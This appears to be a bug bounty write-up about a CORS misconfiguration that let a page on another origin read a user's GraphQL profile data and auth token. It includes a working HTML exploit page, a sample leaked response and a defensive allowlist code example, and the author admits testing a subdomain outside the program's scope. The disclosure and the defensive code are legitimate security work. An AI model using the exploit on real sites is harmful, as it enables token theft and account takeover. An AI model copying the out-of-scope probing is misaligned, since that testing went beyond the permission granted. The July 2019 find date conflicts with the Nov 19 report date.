CORS Misconfiguration: Steal victim token and PII leads to ATO
    BugBounty 2021. 3. 22. 06:00

    Today I will talk about a bug I found in July 2019 on a private program on HackerOne. The bug is a Cross-Origin Resource Sharing (CORS) misconfiguration.

    1-What is CORS?

    Cross-Origin Resource Sharing (CORS) is the mechanism that lets a web browser make cross-origin requests (for example with the XMLHttpRequest API) and read the responses in a controlled manner. The browser attaches an Origin header that identifies the site initiating the request, and the server answers with an Access-Control-Allow-Origin header that names the origin allowed to read the response. If the server also sends Access-Control-Allow-Credentials: true, the browser permits that read even for a request that carried the user's cookies. The misconfiguration is a server that reflects whatever Origin it receives into Access-Control-Allow-Origin while credentials stay enabled: a page on an attacker's site can then send an authenticated request on the victim's behalf and read the result.


    2-Program Scope

    After reviewing the program scope, I concluded that all subdomains were out of scope; only the main domain was in scope.

    3-Steps To Reproduce

    Day one: I started hunting on the main domain www.redact.com. I studied how the program's services work and tested for bugs, but the site was quite secure.
    Day two: I went back to testing. When I viewed the source code I noticed a subdomain in the code named core-plugins.redact.com.
    I knew it was out of scope, but my mind told me to test it.
    The subdomain core-plugins.redact.com does not have a registration page; I could only log in with my account from the main domain (SSO). After logging in I found this request:

    It printed PII in the response: token, email, user info, etc.
    Then I noticed Access-Control-Allow-Credentials: true in the response, so I changed the Origin header: I removed core-plugins.redact.com and added https://evil.com instead, and it worked!

    Then I edited the GraphQL query to steal more info.
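The following is an added example, not code from the original post or from the program involved. It shows in working JavaScript the server-side decision the CORS explanation above describes, the origin-reflecting misconfiguration beside an exact-match allowlist fix, and a check that classifies a captured response the same way the Origin-swap test in the steps above does. The hostnames are placeholders taken from the post, the captured headers are constructed, and nothing here touches the network.

```javascript
// Added example, not code from the original post: how a server decides the CORS
// response, the origin-reflecting misconfiguration beside an allowlist fix, and a
// check that classifies a captured response the way the Origin-swap test does.
// Hostnames are placeholders from the post; no network access is involved.

// Assumed allowlist for the hardened handler (placeholder hostnames).
const TRUSTED_ORIGINS = new Set([
  "https://www.redact.com",
  "https://core-plugins.redact.com",
]);

// Vulnerable pattern: echo whatever Origin the browser sent and allow cookies.
// Any origin, including https://evil.com, then gets a credentialed read.
function corsHeadersReflecting(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened pattern: exact-match allowlist (no substring or regex matching, which
// an origin like https://redact.com.evil.com would defeat), plus Vary: Origin so
// a shared cache does not hand one origin's headers to another. Unknown origins
// get no CORS headers at all, so the browser refuses the cross-origin read.
function corsHeadersAllowlist(origin) {
  if (!origin || !TRUSTED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// What a page at requestOrigin can read from a response carrying these headers,
// following the browser rules: a wildcard never satisfies a credentialed
// request, and an exact origin match plus ACAC: true allows the cookie-bearing
// read that leaked the token in the post. Header names are case-insensitive.
function corsReadAccess(requestOrigin, responseHeaders) {
  const h = {};
  for (const [name, value] of Object.entries(responseHeaders)) {
    h[name.toLowerCase()] = String(value).trim();
  }
  const acao = h["access-control-allow-origin"];
  const acac = (h["access-control-allow-credentials"] || "").toLowerCase() === "true";
  if (!acao) return { anonymous: false, credentialed: false };
  if (acao === "*") return { anonymous: true, credentialed: false };
  if (acao !== requestOrigin) return { anonymous: false, credentialed: false };
  return { anonymous: true, credentialed: acac };
}

// The manual test from the steps above: replay the request with an Origin the
// attacker controls and ask whether the session-bound response is readable.
function attackerCanReadSession(attackerOrigin, responseHeaders) {
  return corsReadAccess(attackerOrigin, responseHeaders).credentialed;
}

// Constructed headers standing in for the captured response in the post: the
// substituted Origin came back verbatim together with ACAC: true.
const CAPTURED_RESPONSE_HEADERS = {
  "Content-Type": "application/json",
  "Access-Control-Allow-Origin": "https://evil.com",
  "Access-Control-Allow-Credentials": "true",
};

function demo() {
  const evil = "https://evil.com";
  const trusted = "https://www.redact.com";
  return {
    captured: attackerCanReadSession(evil, CAPTURED_RESPONSE_HEADERS),      // true
    reflecting: attackerCanReadSession(evil, corsHeadersReflecting(evil)),  // true
    allowlisted: attackerCanReadSession(evil, corsHeadersAllowlist(evil)),  // false
    trustedStillWorks: corsReadAccess(trusted, corsHeadersAllowlist(trusted)).credentialed, // true
  };
}

console.log(demo());
```

On a live target the same check is the request from the steps above replayed with the Origin header set to a host you control while the session cookie is still attached; if the response echoes that Origin in Access-Control-Allow-Origin and carries Access-Control-Allow-Credentials: true, a page on that host can read the body, which is exactly what turns a token in the response into an account takeover.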

    4-Exploitation Code


    <!DOCTYPE html>
    <html>
    <body onload=cors_exploit()>
    <h2>Exploiting CORS Vulnerability </h2>
    <h3>Extract SID</h3><div id=cors></div>
    <button type="button" onclick=cors_exploit()> Exploit</button>
    <script>
    function cors_exploit() {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
          // Show the stolen response and print it into the page
          document.getElementById("cors").innerHTML = this.responseText; alert(this.responseText);
        }
      };
      xhttp.open("GET", "https://core-plugins.redact.com/graphql?app=web&query=query%20App%20{customer%20{id,...F2}}%20fragment%20F0%20on%20Customer%20{is_premier,is_premier_parent,premier_permissions,username,user_type,full_name,organization_id,customer_id,hostname,token,id}%20fragment%20F1%20on%20Customer%20{premier_permissions,is_premier_parent,id}%20fragment%20F2%20on%20Customer%20{username,full_name,email,is_admin,id,...F0,...F1}", true);
      xhttp.withCredentials = true; // send the victim's session cookie with the cross-origin request
      xhttp.send();
    }
    </script>
    </body>
    </html>



    Then I uploaded it to my website at www.mysite.com/cors.html and it worked: the data was printed!


    {
      "data": {
        "customer": {
          "id": "u285728853",
          "username": "storedthings133776",
          "full_name": null,
          "email": "storedthings1337@gmail.com",
          "is_admin": false,
          "is_premier": false,
          "is_premier_parent": false,
          "premier_permissions": [],
          "user_type": "core user",
          "organization_id": null,
          "customer_id": "285728853",
          "hostname": "core-plugins.redact.com",
          "token": "1/eyJjbGllbnRfaWQiOiI3YTE*****************"
        }
      },
      "extensions": {}
    }


    5-The Token


    With the token, an attacker could access the victim's account, perform any action on the victim's behalf, and reach the other endpoints of the API.



    Nov 19th : Report Sent

    Nov 20th: Triaged

    Nov 20th: rewarded

    — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

    That's all, thank you very much for reading to the end. I hope you enjoyed it. Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters
